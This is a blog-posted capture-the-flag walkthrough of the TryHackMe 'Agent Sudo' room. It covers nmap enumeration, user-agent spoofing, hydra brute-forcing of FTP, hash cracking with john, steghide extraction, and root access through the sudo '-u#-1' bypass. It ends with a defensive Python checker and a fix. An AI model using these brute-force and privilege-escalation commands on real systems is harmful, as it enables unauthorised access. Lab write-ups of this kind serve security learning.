tryhackme-Agent Sudo

Description: You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

Enumeration

nmap -sV -T4 -v 10.10.123.164

NSE: Script scanning 10.10.123.164.
Initiating NSE at 02:16
Completed NSE at 02:16, 0.01s elapsed
Initiating NSE at 02:16
Completed NSE at 02:16, 0.00s elapsed
Nmap scan report for ip-10-10-123-164.eu-west-1.compute.internal (10.10.123.164)
Host is up (0.0053s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 02:7F:20:E0:24:EF (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds
           Raw packets sent: 1002 (44.072KB) | Rcvd: 1002 (40.080KB)

Web page

Dear agents,

Use your own codename as user-agent to access the site.

From,
Agent R

Analysis

Three open ports
codename: user-agent

The User-Agent has to be changed and the request replayed (the note is signed by Agent R, so the codename is guessed to be a single uppercase letter). curl reference: https://www.ruanyifeng.com/blog/2019/09/curl-reference.html
curl -A "A" -L 10.10.123.164
When it is
curl -A "C" -L 10.10.123.164
the result is:
Attention chris, <br><br>

Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>

From,<br>
Agent R
The agent's name is chris.

Hash cracking and brute force

ftp

hydra -l chris -P /usr/share/wordlist/rockyou.txt 10.10.123.164 ftp    gives the FTP password

binwalk -e cutie.png    extract the files embedded in the image

Use zip2john to extract the hash and john to crack it, which gives the zip password.

Extracting the archive gives a string; base64-decoding it gives the password: Area51

Use steghide to recover the data hidden in the other image:
steghide info jpg    // check whether anything is hidden
steghide extract -sf png    // extract the hidden data

This gives the SSH username and password.

Capture the user flag

Log in over SSH and the flag is right there.
As for the image:
scp james@10.10.123.164:png /localdir/    download it locally, then identify it with Google reverse image search

Privilege escalation

sudo -l

(ALL, !root) /bin/bash

Googling "(ALL, !root) /bin/bash" leads to: https://www.exploit-db.com/exploits/47502

The sudo version here is below 1.8.28, so sudo -u#-1 /bin/bash does the job.
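As an added example (not part of the original writeup), a small Python check a defender can run over a sudoers dump and a `sudo -V` banner to flag the combination this step abuses: a Runas list of the form (ALL, !root) together with a sudo version below 1.8.28. The sudoers lines and the version banner are constructed sample input, not data from the machine.

```python
import re

# Constructed sample input (not the target machine's real data): a sudoers
# fragment whose Runas spec matches what `sudo -l` showed, and a `sudo -V` banner.
SAMPLE_SUDOERS = """
Defaults env_reset
root    ALL=(ALL:ALL) ALL
chris   ALL=(ALL, !root) /bin/bash
james   ALL=(ALL, !root) NOPASSWD: /bin/bash
deploy  ALL=(www-data) /usr/bin/systemctl
"""
SAMPLE_VERSION_BANNER = "Sudo version 1.8.21p2"
FIXED_VERSION = (1, 8, 28)  # the writeup's threshold: older sudo is affected

# user  host=(runas_users[:runas_groups]) [tags:] commands
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")

def parse_sudo_version(banner: str) -> tuple:
    """Return (major, minor, patch) from a `sudo -V` banner; the 'pN' suffix is ignored."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    if not m:
        raise ValueError("no version number in banner")
    return tuple(int(x) for x in m.groups())

def runas_is_all_minus_root(runas: str) -> bool:
    """True when the Runas user list grants ALL but relies on a negated entry such as !root."""
    users = runas.split(":", 1)[0]          # drop the optional ':group' part
    parts = [p.strip() for p in users.split(",")]
    return "ALL" in parts and any(p.startswith("!") for p in parts)

def find_negation_rules(sudoers_text: str) -> list:
    """Return (user, runas, commands) for every rule whose Runas spec is ALL with a negation."""
    findings = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()   # strip comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if m and runas_is_all_minus_root(m["runas"]):
            findings.append((m["user"], m["runas"].strip(), m["cmds"].strip()))
    return findings

def assess(sudoers_text: str, version_banner: str) -> dict:
    """Combine both signals: the rule pattern alone is a smell, with old sudo it is exploitable."""
    version = parse_sudo_version(version_banner)
    rules = find_negation_rules(sudoers_text)
    return {"version": version, "negation_rules": rules,
            "at_risk": bool(rules) and version < FIXED_VERSION}

if __name__ == "__main__":
    print(assess(SAMPLE_SUDOERS, SAMPLE_VERSION_BANNER))
```

The fix is either upgrading sudo to 1.8.28 or later or rewriting the rule with an explicit allow-list of Runas users instead of ALL with a negation.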

posted @ 2023-03-06 10:41  gvpn